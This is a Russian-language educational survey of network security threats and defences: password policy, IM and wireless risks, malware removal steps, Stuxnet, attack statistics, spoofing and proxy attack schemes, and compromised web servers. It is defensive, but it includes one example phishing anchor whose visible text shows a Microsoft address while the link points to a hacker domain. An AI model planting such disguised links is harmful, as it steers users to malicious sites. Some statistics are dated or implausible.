Scam - мошеннический трюк, заключающийся в том, чтобы, ссылаясь на авторитетных лиц, втереться в доверие и извлечь коммерческую выгоду. Первооткрывателями этого вида мошенничества были адресаты из Нигерии. Смотри en.wikipedia.org/wiki/Scam. Начиная с 2008 года стал активно использоваться мошеннический трюк, когда предлагается антивирусное (или любое программное защитное средство), при попытке загрузки которого машина оказывается заражена вредоносным кодом. Причем доступ к этой программе часто оказывается платным, что внушает дополнительное доверие потенциальной жертвы.

В организациях с 10000 сотрудников сплошь и рядом имеется до 16000 акоунтов за счет уже давно не используемых (люди уволились). Такие неиспользуемые акоунты могут стать объектом атаки, тем более что их создание может относиться ко времени, когда безопасности паролей не уделялось должного внимания. По этой причине администратор должен требовать регулярного обновления паролей и удалять устаревшие, неиспользуемые акоунты. Следует также учитывать, что средний сотрудник имеет в среднем как минимум 20 паролей (рабочей станции, сервера, базы данных, почты, социальной сети и пр.), это дополнительно усложняет ситуацию. Чрезмерные требования к сложности пароля могут иметь обратное действие - человек его забывает или записывает на видном месте. При большом числе паролей человек выбирает их похожими или даже одинаковыми, что упрощает их подбор злоумышленником. Опросы показывают, что средний человек способен помнить 4 пароля, а должен занать до 40! Именно этот факт делает привлекательным применение многофакторных систем аутентификации (специальные карты-ключи, биометрические данные, например, отпечатки пальцев, голос или радужка глаз).

При разработке новых устройств и программ надо уже на стадии проектирования встраивать в них средства безопасности. Должны быть разработаны специальные курсы обучения тому, как писать безопасные программы, например, CGI.

Прогнозируется, что к 2010 году 90% клиентов в сфере бизнеса будет использовать для общения технологию IM. Здесь клиент знает, с кем общается в реальном времени, IM исключает задержки отклика, характерные для e-mail. Кроме того IM является частью набора технологий UC (Unified Communication), который становится все более популярным. Уязвимость таких систем увеличивается за счет того, что сервисы e-mail, IM, SMS, VoIP и пр. реализуются независимо. Помимо этого, сегодня для IM характерно отсутствие четкой политики безопасности, а средства IM инсталируются клиантами сети предприятия без информирования администратора. Потери из расчета на один инцидент в 2008 году достигли 288000$. Смотри Направления и тенденции развития ИТ-технологий. 2008 год.

Вообще в отношении IM любой пользователь и сетевой администратор должен ответить на ряд вопросов:

1. Следует ли использовать IM в его сети вообще?
2. Могут ли пользователи использовать IM на системах, принадлежащих вашей организации?
3. Нуждается ли организация в специфическом программном обеспечении IM?
4. Следует ли использовать криптографию для обеспечения безопасности IM?
5. Допустимо ли использование IM для частного обмена внутри и вне локальной сети?
6. Следует ли вводить ограничения на передачу данных служебного характера, передаваемых посредством IM?
7. Следует ли вводить определенные требования на запись (журналирование) обменов посредством IM?

Следует внедрять средства записи всех IM-обменов. Это позволит иметь архив всех обменов. Служащие же, зная, что все обмены на предприятии записываются, будут вести себя более осмотрительно. Параллельно можно внедрить фильтрацию IM по ключевым словам, чтобы исключить утечку критической информации. Такие фильтры могут блокировать также передачу вредоносных кодов внутри IM-сообщений.

Так как беспроводные сети находят все более широкое применение, а безопасность таких каналов оставляет желать лучшего, возможен перехват трафика с помощью средств типа sniffer. Высокой безопасности можно не получить даже в случае применения VPN и двухфакторной аутентификации (SecurID). Для хакера такие объекты атаки привлекательны тем, что им не нужно устанавливать соединение с каким-либо объектом в локальной сети, не оставляя следов в FireWall или IDS. Обычный просмотр WEB-страниц может помочь украсть индивидуальные параметры. Пользователи корпоративной сети при работе с WEB-страницами (просмотр требует аутентификации) могут получить уведомление: "Your connection to the network has been lost - please reenter your username and password". Инициатором такого сообщения может быть злоумышленник, который рассчитывает получить ваши аутентификационные параметры. Беспроводные средства облегчают атаки и стационарных объектов. Клиент, купивший карту доступа, получает динамический адрес и его локализация и идентичность достаточно трудно установить. Существуют специальные средства для выявления приборов 802.11, например, Kismet или Air Defense (разновидность IDS). Но такие средства могут использоваться как во благо, так и во вред, они могут помочь обнаружить плохо сконфигурированные точки доступа. Для таких сетей особенно актуальна проблема однозначной идентификации пользователя, где бы он ни находился. Обычно портативные ЭВМ после включения пытаются установить соединение с известными им беспроводными точками подключения (их число может превышать сотню), атакер может сформировать точку доступа, имитирующую один из таких узлов, для установления соединения с данной ЭВМ и получения параметров доступа. В последнее время появились экраны, работающие по технологии стелз, способные экранировать радиоволны определенных частот. Это позволяет обезопасить беспроводные локальные сети, сохраняя работоспособность мобильных телефонов. Эта технология может помочь исключить интерференцию систем, работающих на идентичных частотах.

Если нет насущной потребности, следует дезактивировать вход USB на уровни BIOS. Заметной уязвимостью обладают все переносные ЭВМ. Человек, получивший к такой ЭВМ доступ, за несколько минут может установить новый пароль (с помощью загрузочного диска) и скопировать оттуда любую информацию или установить там троянского коня. Особую категорию составляют домашние ЭВМ. Многие компании одобряют работу своих сотрудников дома (экономится электричество, рабочее место и пр.), удобно это и работникам (экономится время в пути и бензин). При подключении к офисной сети предпринимаются достаточно серьезные меры безопасности, но эта же машина может использоваться детьми, подключающимися к самым разным сайтам, среди которых могут быть ЭВМ злоумышленников. При этом нет никакой гарантии, что в такую машину не попадет троянский конь или другая вредоносная программа. После же подключения в сети компании такая машина может стать источником угрозы для других ЭВМ локальной сети. Покидая рабочее место, целесообразно выйти из ОС (произвести процедуру Logoff), но все ли это делают? По этой причине после 30-60 сек пассивности, ЭВМ должна сама выполнить эту процедуру. Многие компании в случае успешной сетевой атаки скрывают этот факт, чтобы сохранить доверие клиентов. Это приводит к тому, что число жертв увеличивается (такой же атаке подвергаются другие, не предупрежденные об угрозе).

Сигнатуры современных атак могут быть достаточно изощренными. Это может быть не просто попытка установить соединение с определенным портом, а вполне определенная последовательность попыток соединений, приводящая к соединению. Это характерно для доступа к некоторым люкам, специально оставленным хакером в какой-то программе. Такая схема исключает детектирование окон уязвимости простым поиском открытых портов (так работают некоторые программы поиска вторжений). Подробности этой техники смотри по адресу www.portknocking.org.

Появились сообщения о разработки вредоносных кодов, написанных на JavaScript. В это трудно поверить, но если это так, масштаб сетевых угроз увеличивается весьма существенным образом. Ведь в этом случае не нужно ничего копировать с вредоносного сайта, достаточно туда заглянуть. Но по-прежнему главной уязвимостью остается неопытный и малообразованный пользователь.

Наибольшую угрозу представляют атаки с помощью программ, специально написанных для вторжения в конкретную ЭВМ или сеть. К сожалению, большинство разработчиков приложений не учитывает требования безопасности. Сертификация программ, как правило, не включает в себя аспект безопасности (попыток вторжения). Следует разделять уязвимости "врожденные" и специально созданные хакером. Эти два вида бывает трудно разделить, если вы покупаете нелегальное программное обеспечение. Хороший хакер готовит вторжение с тщательной разведки объекта атаки. Это не обязательно сканирование или попытки подбора пароля. Такую информацию хакер может получить из описаний разработанных на сервере-мишени программных продуктов (требования к ОС, версии и т.д.) Он может послать запросы на серверы Whois, посылая команды finger или почтовому серверу и пр. В отдельности такие запросы не говорят ни о чем. Но, если собирать статистику о клиентах сети (используемые запросы, ping, traceroute, сканирования определенных портов и т.д.), то по совокупности этих данных можно с приемлемой вероятностью прогнозировать угрозу.

При стратегическом планировании в сфере сетевой безопасности следует учитывать тенденцию в направлении распределенных систем и более широкого внедрения беспроводных систем. Оба эти фактора делают решение проблем значительно труднее.

По мнению экспертов в последнее время важной мишенью атак становятся приложения, особенно те, которые взаимодействуют или доступны через Интернет. На долю таких приложений приходится до 70% успешных сетевых атак (данные Gartner Group).

В последнее время атаки серверов становятся двухэтапными. Так как сервер обычно защищен лучше рабочей станции, сначала атакуется именно она (например, через e-mail или Explorer). А далее с рабочей станции предпринимается уже атака сервера. Собственно атака даже может быть не нужна, если на рабочую станцию в результате атаки был загружен троянский конь или spyware. Ведь эти коды позволяют перехватить пароль, когда он еще не зашифрован.

• Безопасность системы хранения данных не сводится к созданию надежной системы резервного копирования. И если такая система у вас создана, это не гарантирует вам спокойной жизни.
• Безопасность не зависит от используемого протокола (IP или, скажем, Fibre Channel).
• Криптозащита данных не может считаться панацеей, это всего лишь один из рубежей обороны.
• Важным моментом в деле обеспечения информационной безопасности является согласованность действий всех подразделений предпиятия.
• При организации работ с данными нужно четко определить, кто должен к ним иметь доступ, а кто - нет.
• Доступность очень часто не означает дозволенность. Сюда относятся черные ходы (люки), а также доступ лиц, которые в этом доступе по характеру работы не нуждаются. Смотри также Средства противодействия атакам

Локальная сеть должна быть разумным образом поделена на субсети и VLAN, что осложняет действия локальных атакеров. Для копирования каких-то файлов коллегами может быть открыт доступ к какому-то каталогу или файлу, но по завершении операции доступ не перекрывается, чем могут воспользоваться как локальные, так и удаленные хакеры. Особое внимание должно уделяться безопасности DNS- и почтового серверов, так как именно их атакеры проверяют на прочность первыми.

В последнее время в связи с широким использованием мобильных средств появилась потребность аутентификации мобильных удаленных пользователей и процессов в рамках VPN. Для этой цели часто используется многопараметрическая аутентификация и средства генерации одноразовых паролей (OTP).

Одним из наиболее эффективных способов защиты информации является шифрование сообщений, что к сожалению заметно увеличивает время отклика (шифрование-дешифрование). Задержки при большом входном трафике могут привести к блокировке сервера.

Начинать нужно с классификации информации и сетевых объектов в вашей сети, определения зон ответственности и доступа различных сотрудников.

Если в вашей сети установлен Firewall, автоматически обновляемая антивирусная программа, система обновления прикладных и системных программ, IPS/IDS, VPN и система фильтрации почты и WEB-данных, это еще не гарантирует безопасности (100%-защиты ничто не может гарантировать). Все эти барьеры легко можно обойти (в сети описаны методики).

Наиболее эффективными являются простые правила предосторожности, диктуемые здравым смыслом.

1. Не устанавливать на своей машине программ, назначение которых вам не известно. Еще лучше, но редко осуществимо, запретить пользователям самостоятельно инсталлировать программное обеспечение.
2. Не кликайте без разбора мышкой на кнопках просматриваемых страниц, например на "click her to close" (функция этой кнопки на неизвестном сайте может быть много "богаче"), лучше закройте страницу, если сайт вам не известен.
3. Не открывайте сообщения SPAM и не кликайте мышкой на ссылках в таких сообщениях.
4. По возможности не используйте программы файлового обмена peer-to-peer (P2P)
5. Убедитесь, что настройки вашего броузера запрещают какую-либо загрузку, не спросив разрешения пользователя.
6. Установите экран, осуществляющий фильтрацию трафика в реальном времени, и выполняйте регулярное сканирование системы.

Мировой опыт обеспечения безопасности говорит о том, что нельзя обойтись каким-то одним программным средством мониторинга и защиты. По этой причине лучше иметь несколько средств различной функциональности, полученных из разных но достойных доверия источников. Смотри "TechTarget Guide to Spyware, Data Leakage, and Spyware Recovery". Для выявления вирусов, spyware и rootkit можно заглянуть, соблюдая осторожность, на следующие серверы:

1. http://vil.nai.com/vil/stinger
2. http://www.spybot.info/en/index.html
3. http://www.microsoft.com/athome/security/spyware/software/default.mspx
4. http://www.sysinternals.com/Utilities/RootkitRevealer.html
5. http://greatis.com/unhackme
6. http://www.f-secure.com/blacklight

Можно попробовать некоторые общедоступные программные средства сканирования. Запрос Google "free antivirus" может помочь вам найти нужные средства. Ниже приведен список таких источников (но перед их установкой лучше провести проверку на наличие в них самих malware):

1. http://www.pestpatrol.com/prescan.htm
2. http://www.ewido.net/en/onlinescan
3. http://housecall.trendmicro.com/
4. http://www.pandasoftware.com/products/activescan

Следует проверить все потенциально опасные места в системе компьютера, такие как каталог startup Windows, Startup tab в файле msconfig, а также любые ключи регистра, сслылающиеся на эту программу из anyHKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run в regedit. Небесполезно просмотреть и содержимое всех временных каталогов Windows temp . Таким образом нужно просканировать всю систему. Полезно время от времени вообще удалять содержимое всех пользовательских и системных каталогов типа TEMP, а также cookie. Крайне полезно отслеживать, желательно автоматически, любые изменения конфигурационных файлов.

Следует загрузить системный Process Explorer и просмотреть загруженные процессы и приложения. Это может выявить работающие malware. Для поиска malware, подключенного к локальным портам TCP или UDP можно запустить Foundstone's Vision. Можно использовать сетевой анализатор (например, CommView или Ethereal), что посмотреть, что происходит в сетевом сегменте.

Следует удалить (выгрузить) любые программы, если вы подозреваете их зараженность, после чего повторите сканирование. Может так случиться, что в вашей системе присутствуют файлы, заблокированные против стирания или помещенные под карантин вашей программой удаления, это могут быть вредоносные коды.

Никогда не посещайте сайтов, где вместо имени указан IP-адрес. Это может быть взломанный домашний компьютер, используемый для распространения malware.

Постарайтесь заблокировать восстановление и перезагрузку системы в safe mode и после этого запустите вашу программу детектирования/удаления вирусов/spyware. Для этой цели хороши программы, поставляемые на бутабельном CD.

Может так случиться, что ваши проблемы связаны с повреждением программы или неисправностью оборудования, а не с malware. Попытайтесь реинсталлировать Windows или поврежденное приложение. Если это не помогло, попытайтесь вернуть систему к состоянию, когда она работала, восстановив конфигурацию оборудования.

Не полагайтесь безгранично на Google или другую поисковую систему в отношении рекомендуемых программ детектирования и очистки системы от malware. Внимательно изучите сайты ведущих поставщиков соответствующего программного обеспечения (Symantec, Trend Micro, Sophos и др.), чтобы выбрать нужное решение для вашей проблемы. Сайты Symantec's Security Response и CA's Spyware Encyclopedia содержат много полезной информации.

В 2009 году, до появления Stuxnet, когда операторы GRID только начали говорить о необходимости защиты критической инфраструктуры от кибератак, редкие фирмы нанимали специалистов по информационной безопасности (см. After Stuxnet: The new rules of cyberwar (новые правила кибервойны). Каждый раз, когда Stuxnet запускается, компьютер записывет внутри исполняемого файла имя компьютера, его IP-адрес, имя группы или доменную часть имени. Анализ этих запией показал, что Stuxnet не покинул пределов локальной сети. Были и атаки-предшественники, которые показали, что первая зараженная машина принадлежала Foolad Technic Engineering Co., базирующейся в Исфагане, Иран. Эта компания создавала автоматизированные системы для иранской промышленности. Следует иметь в виду, что помимо разрушительной функции Stuxnet имеет и разведывательную секцию. 7-го июля 2009г, Stuxnet заразил другую иранскую компанию Neda Industrial Group, на которую распространялись санкции США. Помимо этого Stuxnet поразил домен CGJ, принадлежащий Control-Gostar Jahed и занимающейся автоматизацией. Позднее Stuxnet.b заразил компьютеры иранской компании Behpajooh Co. Elec & Comp. Engineering. Под эпидемию попали машины компании Mobarakeh Steel Company и многих других, не вовлеченных в ирнскую ядерную программу.

Разработка Stuxnet показала, что объект из виртуального мира может нанести реальный физический ущерб. Это поставило вопрос о разработке международных стандартов по кибербезопасности.

Такое сродство "хороших" программ с ошибками и malware породило специальный термин badware (bad software = плохая программа - вспомним "плохую" квартиру у Булгакова). Так что у нас появляется еще один стимул искать пути минимизации ошибок в программах.

Поставщики антивирусных и анти-spyware программ могут предложить специфические средства, о которых вы возможно и не слышали, но которые вполне могут помочь в вашем случае. Не бойтесь использовать средство от поставщика, отличного от используемого вами. Следует иметь в виду, что разные продукты имею разную функциональность и возможности. Противодействие spyware в последнее время стало особенно актуальным. Здесь важны как средства профилактики, так и утилиты на случай, когда заражение уже произошло. Обзор таких средств можно найти в Spyware Removal Checklist, а также Средства для борьбы со spyware.

Хэшируйте подозрительный файл с помощью, например, HashCalc и сравните с результатом, полученным для заведомо рабочей копии этого файла.

Если возникли сомнения, выполните перезагрузку. Если вам не удается перезагрузить Windows -- происходит повисание или бесконечные попытки перезагрузки, начиная с определенной точки it -- даже в safe mode, тогда можно осуществить полную переустановку системы. Но прежде чем делать это, попытайтесь использовать Winternal's ERD Commander, чтобы спасти нужные вам файлы. Можно также попробовать восстановить систему с помощью backup.

На уровне фирмы или организации необходим специальный план реагирования на любой сетевой инцидент. Одно дело очистить одну или две машины и совершенно другое - выполнить то же самое для целой сети. Ниже приведен список ссылок, которые могут быть полезными для решения рассмотренных проблем:

1. http://csrc.nist.gov/publications/nistpubs/800-83/SP800-83.pdf
2. http://csrc.nist.gov/publications/nistpubs/800-61/sp800-61.pdf
3. http://www.first.org/resources/guides
4. http://cirt.rutgers.edu/tools.php

Смотри:
http://www.nwc.com/showitem.jhtml
http://www.oasis-open.org
http://vulcan.forumsys.com
http://nwc.securitypipline.com (Network Computing USA's Security Pipeline - 'XML Gateways' article by Lori McVittie).

До недавнего времени компания CISCO хранила пароли в конфигурационных файлах в виде открытого текста, теперь они собираются использовать хешированное хранение паролей.

Но современные ЭВМ легко позволяют подобрать пароль при наличии хеша (2ГГц Intel может проверить 5000 паролей в сек). По этой причине нужно ограничить доступ к файлу хешей паролей. Табличный метод (rainbow tables) может ускорить подбор на порядок.

Многофакторная аутентификация является, похоже, единственной альтернативой современной системе паролей. Здесь имеется в виду использование сертификатов, ID-карт пользователей, и контроль их биометрических данных (отпечатков пальцев, голоса или радужной оболочки глаза).

Примерно 90% всех мобильных приборов (лэптопы, MP3, USB-флэшки) не имеют необходимой защиты. Кроме того каждый год более одного миллиона компьютеров теряется или крадется, при этом менее 2% удается вернуть. Кража корпоративного laptop в среднем обходится в более чем 80000$. За два с половиной года было компрометировано 160000000 рекордов конфиденциальной информации.

Расцвет сетевого воровства происходит, в том числе и потому, что грабить человека, лица которого не видишь, психологически много проще.

Число официально зарегистрированных в мире сетевых инцидентов различного рода возрастает экспоненциально, о чем можно судить по рис. 2. (см. http://www.cert.org/stats/). Этот рост совпадает с ростом числа узлов в Интернет, так что процент хулиганов и шизофреников величина похоже инвариантная. Атаки можно разделить на несколько классов:

• Базирующиеся на дефектах протоколов, например, TCP.
• Использующие дефекты операционной системы
• Пытающиеся найти и воспользоваться дефектами программ-приложений, включая, например, CGI
• Эксплуатирующие человеческие слабости (любопытство, алчность (загрузка бесплатного программного обеспечения) и пр., например, троянские кони)

Список номеров портов для известных троянских коней можно найти в http://www.simovits.com/nyheter9902.html

В 2004 году зарегистрировано 523 10⁹ сетевых инцидентов (это явилось результатом мониторинга 450 сетей в 35 странах мира). Из них 41% атак соответствовали различным видам несанкционированной активности, 26% - попытки несанкционированного доступа, 21% - представляли собой сканирования, 9% - DoS атаки и 3% - попытки некорректного использования приложений. Особенно популярно в последнее время использование уязвимостей броузеров. За последние шесть месяцев 2005 года выявлено более 1000 новых сетевых червей и вирусов (см., например, http://www.acmqueque.com). Большинство вирусов и червей с самого начала делаются полиморфными и метаморфными. Разработчиками предпринимаются специальные меры по их маскировке. Некоторые виды этих вредоносных программ, попав в ЭВМ жертвы, выявляет возможные уязвимости (результат такого исследования может быть передан автору программы по IRC каналам) для последующих атак с привлечением других средств.

Внутренняя структура и функциональность вирусов и червей существенно усложняется. Они уже могут подбирать для себя специфические объекты для атаки. Для этих целей вирусы и черви используют информационные ресурсы, например, поисковые системы типа Google. Таким образом, они уменьшают вероятность обнаружения и повышают число жертв, так как время от момента разработки до детектирования и выработки средства противодействия увеличивается. Кроме того, скрытность атаки повышает ее экономическую эффективность, ведь чем дольше факт атаки остается неизвестным, тем большую прибыть может получить хакер. Появился даже специальный термин Google hacking (или Google injection) для разновидностей атак, использующих поисковые системы для выявления данных, необходимых для атаки. Имеется база данных GHDB (Google Hacking Database), где хранятся запросы, которые призваны идентифицировать чувствительную информацию.

Если раньше большинство атак имели своей целью мелкое хулиганство, форму самоутверждения или спортивный интерес, теперь все больший процент атак преследует преступные цели и коммерческий интерес. Хакеры готовят и продают наборы взломанных ими ЭВМ для рассылки спама, фишинга и для DoS атак. На данном этапе эти атаки предпринимаются против полулегального бизнеса (азартные игры через Интернет, порнографические сайты и т.д.). В последнее время отмечается тенденция применения сетевых атак с политической мотивацией. Данная тенденция означает, что средства вторжения будут выполнены все более профессионально. Разработчики вредоносных кодов предлагают даже послепродажное обслуживание и обновление.

К первому типу относятся и атаки типа SMURF, ICMP flood и TCP SYN flood. ICMP flood не использует эффектов усиления на локальных широковещательных адресах, а работает c адресами типа 255.255.255.255. Здесь следует заметить, что для аналогичных целей хакеры могут использовать и протоколы TCP или UDP.

Рис. 2. Распределение числа официально зарегистрированных сетевых инцидентов по годам.

Разнообразие угроз, подстерегающих пользователя, работающего в сети, огромно. Часть из них является платой за использование сложных информационных технологий, уязвимых к внешним воздействиям, другая часть сопряжена с деятельностью людей. Некоторые угрозы носят объективный характер, например, нестабильность или низкое качество питающего напряжения, электромагнитные наводки или близкие грозовые разряды, другие могут быть связаны с невежеством или неаккуратностью самого пользователя. На рис. 3. сделана попытка составить классификацию существующих угроз (схему нельзя рассматривать исчерпывающей).

Рис. 3. Схема классификации угроз

Ниже на рис. 4 показано распределение атак сети ИТЭФ по их разновидностям (Это и последующие два распределения построены студентом МФТИ А.Тарховым).

Рис. 4.

На рис. 5 показана зависимость числа атак от времени суток, полученная за 19 дней.

Рис. 5.

На рис. 6 показано распределение атак по доменным зонам. Из распределения видно, что этому занятию предаются чаще всего "жители" больших и комерческих сетей. Хотя нельзя исключить, что именно они являются чаще жертвами хакеров.

Рис. 6.

Для того чтобы писать и эффективно поддерживать программы распознавания атак, надо знать и учитывать распределение атак по сигнатурам, по времени суток (не исключено, что перечень регистрируемых сигнатур может меняться для дневного и ночного времени), по сложности распознавания и методам противодействия. Вычислительные ресурсы ЭВМ-регистратора всегда будут критическим параметром, так как число атак в единицу времени, и количество разных сигнатур будет только расти. По этой причине вряд ли когда-либо можно будет позволить мониторировать все известные виды атак. Да и необходимость этого не очевидна (вряд ли сейчас нужно контролировать атаки ОС DOS). Здесь не рассматриваются проблемы информационной безопасности (аутентификация, сертификация, шифрование файлов и пакетов и пр.). В таблице 1 представлено распределение атак по определенным классам. (смотри http://advice.networkice.com/advice/Intrusions/)

Таблица 1

В раздел “прочие” попали атаки ОС и известных слабостей системных программ и приложений (например, потайные двери/люки), атаки типа “ложный маршрутизатор” IDENT, SQL, сетевых печатающих устройств, NFS, SOCKS, SMB, WINS, IIS и т.д.

В статистику не были включены атаки маршрутизаторов (например, CISCO, Ascend и пр.), специфических серверов (например, поисковых, почтовых, печати, Firewall), атаки разнообразных драйверов баз данных, фальсификация МАС-адресов, перехват ключей, сертификатов и паролей и т.д. Реальное число зарегистрированных сигнатур атак, полагаю, давно перевалило за 1000.

Важным фактором является актуальность базы данных сигнатур, ведь наличие сигнатуры в базе данных не означает присутствия этого типа атак во входящем трафике. Некоторые сигнатуры “выходят из моды” быстро и навсегда.

Сигнатуры, распознаваемые по заголовку пакета, составляют несколько более 15% (здесь учтены манипуляции с заголовками SNMP, включая community, а также фальсификации DNS-заголовков). Сюда следует, разумеется, отнести и подбор кода community.

Заметный процент составляют атаки, рассчитывающие достичь эффекта путем переполнения буфера (входного буфера приложения, пароля, имен и т.д.), это - 11.3%. Это один из самых сложных случаев, ведь надо знать размер буфера для каждого приложения, которое может стать объектом атаки.

Атаки на CGI сопряжены с генерацией нестандартных строк URL и параметров (6.5%), некоторые из них также работают в расчете на переполнение буфера параметров.

Некоторые сигнатуры, требуют анализа не только входящего, но и исходящего трафика (например, шторм неспровоцированных откликов), что существенно усложняет алгоритм распознавания (смотри комментарии к рис. 7).

Отдельный класс образуют атаки механизма сборки сегментированных TCP-пакетов. Эти уязвимости имеют некоторые NGFW (New Generation FireWall) и IDS (Intrusion Detection System) системы. Смотри "Does TCP/IP reassembly pose a TCP/IP packet format risk?", Brad Casey.

ФБР (США) поделило все сетевые события и инциденты на 6 категорий по их опасности:

Атаки, связанные с рассылкой вирусов, червей, кроликов, троянских коней или молдавская связь, как правило требуют для достижения цели сотрудничества со стороны жертвы (используется алчность, любопытство или хотя бы беспечность).

Мало зарегистрировать атаку, надо определить и корректно интерпретировать IP-адрес, откуда эта атака исходит. Чаще всего, имея IP-адрес, достаточно легко отследить путь атаки, например посредством Trace Route. Полезным может оказаться утилита NSLookup, а также служба Whois, которая позволяет определить сервис-провайдера атакера и его географическое положение.

Но существует класс атак с фальсификацией адреса отправителя, когда эту задачу решить затруднительно. Эта техника используется большинством атак отказа обслуживания (DoS), а также некоторыми другими. Два примера такого типа атак описаны на рис. 3 и 4.

Атака через прокси серверы (например, при наличии загруженной в ЭВМ SOCKS программы WinGate) представлена на рис. 7.

Рис. 7.

Здесь атакер (hacker на рисунке) использует прокси-сервер, через который связаны с Интернет ЭВМ на левой части рисунка, для атаки машины (victim). При этом для атакуемой машины будет казаться, что ее атакует ЭВМ SOCKS. Особенностью этого класса атаки является то, что атакер может находиться где угодно в Интернет. Но в случае жалобы со стороны ЭВМ-жертвы его положение может быть легко локализовано, при наличии доброй воли администратора или владельца прокси-сервера.

Хакер может создать прокси сервер, имитирующий работу сайта какой-то известной компании. Пользователь будет в конце концов переадресован на сервер этой компании, но все пакеты клиента будут идти через прокси хакера. Это для него особенно привлекательно, если пользователь должен авториризоваться на сервере компании. Ведь людям свойственно использовать ограниченный набор паролей и хакер может использовать перехваченный пароль для атаки других ресурсов, где авторизован пользователь. Хакерский прокси-сервер может использоваться и для снабжения клиента различными видами вредоносного программного обеспечения. С помощью прокси можно переадресовывать запросы клиентов на вредоносные сайты. Прокси могут использоваться и для фальсификации откликов DNS-серверов.

Рис. 8.

На рис. 8 показана схема атаки с зеркалированием пакетов в маршрутизаторе R. Маршрутизатор R сконфигурирован так, чтобы копии пакетов, следующих из ЭВМ А в ЭВМ В, попадали в машину Х (ЭВМ атакера). В данной схеме атакер должен договориться с администратором R (если это не он сам), так как нужна специфическая конфигурация маршрутизатора. Но он может выйти из положения, сформировав на своей ЭВМ ложный маршрутизатор, поддерживающий протокол внешней маршрутизации BGP.

Такая схема позволяет Х атаковать А, создавая впечатление, что ее атакует ЭВМ В. Для ЭВМ В будет иметь место эффект шторма неспровоцированных откликов со стороны ЭВМ А (если для атаки использован протокол ТСР).

Для распознавания сигнатуры атаки в ЭВМ В нужно регистрировать входящие пакеты с адресом А и флагом ACK, проверяя в то же время факт, что ЭВМ В не посылала А никаких пакетов.

Данная схема атак (с фальсификацией адреса отправителя) пригодна также и для относительно безопасной рассылки SPAM.

Одной из задач любого хакера является сокрытие факта атаки и по возможности ее источника. Одним из методов достижения этой цели - анонимизаторы. Это по существу разновидность прокси-серверов. Главная их цель - скрыть адрес источника запросов. Анонимизаторы позволяют обойти фильтры URL-имен и нарушать политику доступа к определенным ресурсам. Например, в школах и библиотеках может быть запрещен доступ к YouTube, MySpace и Facebook, но с помощью домашнего компьютера с программой анонимизатора такой запрет может быть обойден. Проблему усугубляет наличие у некоторых ресурсов нескольких IP-адресов (при одном URL). Серверы-анонимизаторы были созданы гражданами государств с репресивными режимами, чтобы работать с Интернет, не рискуя быть подвергнутыми преследованиям (см. Anonymizers - The Latest Threat to Your Web Security).

В 2006 году десятку самых разрушительных видов сетевых атак составили (большая их часть относится к ОС Windows; данные глобальной сети SophosLabs, включающей в себя десятки тысяч станций):

1. Mytob - сетевой червь (автор российского происхождения, гражданин Морокко Фарид Эссебар, 18 лет, получил за это достижение 2 года тюрьмы).
2. Netsky - червь. Автор, тинейджер из Германии, приговорен к одному году и девяти месяцев тюрьмы.
3. Sober - семейство Malware (разработано в 2003, остановлено распространение в январе 2006). Имеет несколько разновидностей червь/троянский конь.
4. Zafi - вирус (впервые появился в апреле 2004 средой распространения является почта).
5. Nixem - сетевой червь. Среда распространения - файлы типа DOC, MDB, PPT, PPS, ZIP, RAR, PSD, PDF и DMP.
6. Bagle - вирус. Создан в 2004 году, последняя вспышка заражений приходится на февраль 2006.
7. MyDoom - червь. Создан в январе 2004. Объявлено вознаграждение размером 250000$, тому кто укажет на автора червя. Уязвимы машины и с новой ОС VISTA.
8. Stratio - червь. Впервые обнаружен в августе 2006 года. Распространяется через SPAM.
9. CLagger - троянский конь. Как все троянские кони для своего распространение нуждается в содействии жертвы.
10. Dref - червь. Распространяется с середины 2005 через IRC. Уязвимы все версии Windows. Для усыпления бдительности используются средства социальной инженерии. Например, сообщается, что Джордж Буш развязал ядерную войну, для получения подробностей предлагается заглянуть в прилагаемый файл. Кого будет беспокоить возможность наличия троянского коня, если началась мировая война?

Россия занимает почетное третье место по числу WEB-серверов, опасных для посещения, следуя за США и Китаем . Большая часть опасных программ (malware) (около 30%) создается в Китае (данные на конец 2006 года), бразильские хакеры создают 14,2% таких продуктов (в основном троянские кони). Россия и Швеция производят соответственно 4.1% и 3.8%. Термин malware (malicious software), прежде чем стать общепринятым, был в начале введен в компьютерный лексикон журналистами и относился исключительно к вирусам и сетевым червям. Для разработки malware все чаще используются приемы, сформированные программистами, работающими в сфере сетевой безопасности. Одним из средств защиты от воздействия посещения вредоносных WEB-серверов является фильтрация URL.

Атаки через WEB-серверы

В данной статье описано много различных атак WEB-серверов и броузеров, но, начиная 2005 года мало-помалу стал формироваться особый класс атак - атаки через WEB-сервер. Ранее считалось, не заходите на сомнительные WEB-сайты и вы в безопасности. Априори считалось, что серверы крупных солидных фирм и государственных учреждений вне подозрений и заход на них не может принести вреда. Сегодня это совершенно не так (пример такого рода смотри выше - атака сайта www.vt21.ru).

Если вдуматься, то такое развитие событий логично. На официальные сайты крупных организаций заходят беззаботно большое число людей, именно по этой причине они являются мишенями атак хакеров. Если атака такого сайта оказывается успешной, хакер размещает там вредоносный код или ссылку на вредоносный сайт. Внешне это может быть более чем безобидно, например, <a href=www.hacker.ru>www.microsoft.ru</a> - ведь пользователю видна лишь URL Microsoft. В результате за короткий срок могут быть заражены и взломаны машины пользователей, посетивших такой WEB-сервер. Смотри Web Based Attacks. Таким образом, одно успешное вторжение может дать хакеру тысячи машин-зомби.

Спектр разновидностей атак этого типа необыкновенно широк. Этому способствует многообразие технологий, используемых на сайтах солидных фирм: мультимедиа, форумы, базы данных, ICQ, PHP и CGI-скрипты и т.д. При просмотре страницы ее образ часто формируется из материалов, поступающих из самых разных источников (до 20), в том числе считываемых через Интернет в реальном масштабе времени. Дополнительную угрозу могут представлять рекламные баннеры, размещаемые непроверенными организациями.

В 2008 году компания Symantec зарегистрировала атаки из 808000 доменов, многие из которых являются серверами достаточно солидных фирм (среди них новостные серверы, сетевые центры по продажам, бюро путешествий, правительственные учреждения и пр.).

Легальные WEB-серверы взламываются посредством:

• SQL-Injection
• Вредоносной рекламы
• Методом переадресации результатов работы поискового сервера
• Через виртуальные хостинговые компании
• Через уязвимости программ, обслуживающих форумы
• Cross-site scripting

К числу уязвимостей прикладных программных средств следует отнести возможность удаленного исполнения произвольных команд, загрузка файлов из Интернет, удаленный запуск исполнения локальных файлов, удаленное разрушение приложения. Надо сказать, что это вопиющие уязвимости, существует огромное множество менее очевидных слабостей прикладных программ.

Все чаще хакеры используют видео и аудио-файлы для перенесения вредоноснх кодов. Пользователям следует проявлять осторожность при участии в вебинарах.

